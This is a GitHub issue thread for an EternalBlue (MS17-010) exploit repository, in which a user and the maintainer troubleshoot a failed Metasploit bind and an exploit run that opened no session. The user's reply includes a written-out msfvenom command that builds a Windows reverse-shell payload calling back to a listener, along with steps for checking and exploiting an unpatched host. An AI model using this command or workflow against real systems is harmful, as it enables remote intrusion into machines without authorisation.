### ISSUE TITLE
BindFailed.

### ISSUE THREAD

**Issue by jepunband** [3ndG4me/AutoBlue-MS17-010#23]
Got this error, tried on many different ports still same issue.
Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444)

I have no issues using Metasploit (ms17_010_eternalblue) alone to perform the same type of attack.  This works.

**Comment by 3ndG4me** [comment]
Hey, could you provide more insight into "what" isn't working?

The error you're giving is related solely to Metasploit being unable to bind to a port and on its own has nothing to do with this project. To me this just looks like you already have something listening locally on port 4444 and therefore the listener can't bind. This isn't something that pertains to this project at all without further context and just seems like user error.

If you could please provide the steps to reproduce the issue, what scripts it was associated with, and any other relevant details that may be helpful.

A good example might be:

I ran the listener_prep.sh script and gave it the information for (myip) on port 4444 and the output is (output) and the error is (error).

When I ran the Metasploit module with the same configuration, LHOST as (myip) and LPORT 4444 I do not get the same issue so I believe it could be related to the script.

Extra info: the payload I was using was X.


^Doesn't have to be exactly like that, in fact that's the bare minimum, but without more information and only an error from a completely unassociated tool, this is something I'll have to close. I usually close these kinds of issues with no response unless multiple reports come in, but since Hacktoberfest just occurred I have been more active and wanted to give any and all issues a chance to make sure this repo is functioning smoothly with all the Python3 changes.

**Comment by Xm17** [comment]
i think u need to input `jobs`
![图片](https://user-images.githubusercontent.com/27048404/98124405-1e0ab500-1eee-11eb-8a50-85ee02f7298f.png)

**Comment by jepunband** [comment]
1. shell_prep.sh
	kernel compiled, reverse shell with msfvenom? Y
	lhost = 192.168.1.11
	lport x64 = 4441
	lport x86 = 4442
	meterpreter or cmdshell = 1
	stage or stageless = 1

output:
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.1.11 LPORT=4444


2. python3 eternal_checker.py 192.168.1.8

output:
The target is not patched

3. listener_prep.sh
	lhost = 192.168.1.11
	lport x64 = 4441
	lport x86 = 4442
	meterpreter or cmdshell = 1
	stage or stageless = 1

4. metasploit out put

	...

	[*] Exploit running as background job 1.
	[*] Exploit completed, but no session was created.


I didn't get any session.

**Comment by 3ndG4me** [comment]
Did you actually run the exploit or just the checker? I can assume you did, because you of course wouldn't get a session without actually running the actual _exploit_ , but it's not listed in the steps you notated above so just making sure.

Assuming you did, consider the stability of the exploit. Sometimes it does take multiple runs, and sometimes the target does crash. Is your target at least crashing when you run the exploit?

If you are certain the target is vulnerable (which seems to be the case since you claim the metasploit module works), then I'd love to know if there is an image you can share of your local target? If so I can use this to test and improve compatibility of the exploit if there is something distinct between metasploit's variant and this repo. If not, then it seems to be an isolated issue with your target, and without knowing all the variables at play with that system's configuration, then it's unfortunately just an individual problem and not a broader issue that can be solved with the project itself. If that's the case you're always welcome to research the issue and contribute a patch for this caveat. I'd be glad to review it and pull it in if it is valid, but external contributors won't be of much help to you then.
